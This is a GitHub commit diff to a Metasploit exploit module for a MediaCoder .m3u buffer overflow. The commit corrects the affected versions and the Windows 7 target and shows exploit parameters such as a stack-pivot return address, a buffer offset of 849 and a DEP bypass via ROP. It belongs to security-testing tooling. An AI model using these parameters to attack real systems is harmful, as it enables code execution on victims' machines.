Skip to content

Commit 8de88cb

Browse files
committed
change target from win7 sp1 to win7 sp0, fix description
1 parent b2a18c3 commit 8de88cb

File tree

1 file changed

+5
-5
lines changed

1 file changed

+5
-5
lines changed

modules/exploits/windows/fileformat/mediacoder_m3u.rb

Lines changed: 5 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -16,11 +16,11 @@ def initialize(info = {})
1616
super(update_info(info,
1717
'Name' => 'MediaCoder .M3U Buffer Overflow',
1818
'Description' => %q{
19-
This module exploits a buffer overflow in MediaCoder 0.8.23. The vulnerability
19+
This module exploits a buffer overflow in MediaCoder 0.8.22. The vulnerability
2020
occurs when adding an .m3u, allowing arbitrary code execution under the context
2121
of the user. DEP bypass via ROP is supported on Windows 7, since the MediaCoder
22-
runs with DEP. This module has been tested successfully on MediaCoder 0.8.23.5530
23-
over Windows XP SP3 and Windows 7 SP1.
22+
runs with DEP. This module has been tested successfully on MediaCoder 0.8.21.5539
23+
to 0.8.22.5530 over Windows XP SP3 and Windows 7 SP0.
2424
},
2525
'License' => MSF_LICENSE,
2626
'Author' =>
@@ -36,7 +36,7 @@ def initialize(info = {})
3636
],
3737
'DefaultOptions' =>
3838
{
39-
'EXITFUNC' => 'seh'
39+
'EXITFUNC' => 'seh',
4040
},
4141
'Platform' => 'win',
4242
'Payload' =>
@@ -48,7 +48,7 @@ def initialize(info = {})
4848
},
4949
'Targets' =>
5050
[
51-
[ 'MediaCoder 0.8.23.5530 / Windows XP SP3 / Windows 7 SP1',
51+
[ 'MediaCoder 0.8.21 - 0.8.22 / Windows XP SP3 / Windows 7 SP0',
5252
{
5353
'Ret' => 0x6afd4435, # stack pivot (add esp,7ac;pop pop pop pop ret from postproc-52.dll)
5454
'Offset' => 849,

0 commit comments

Comments
 (0)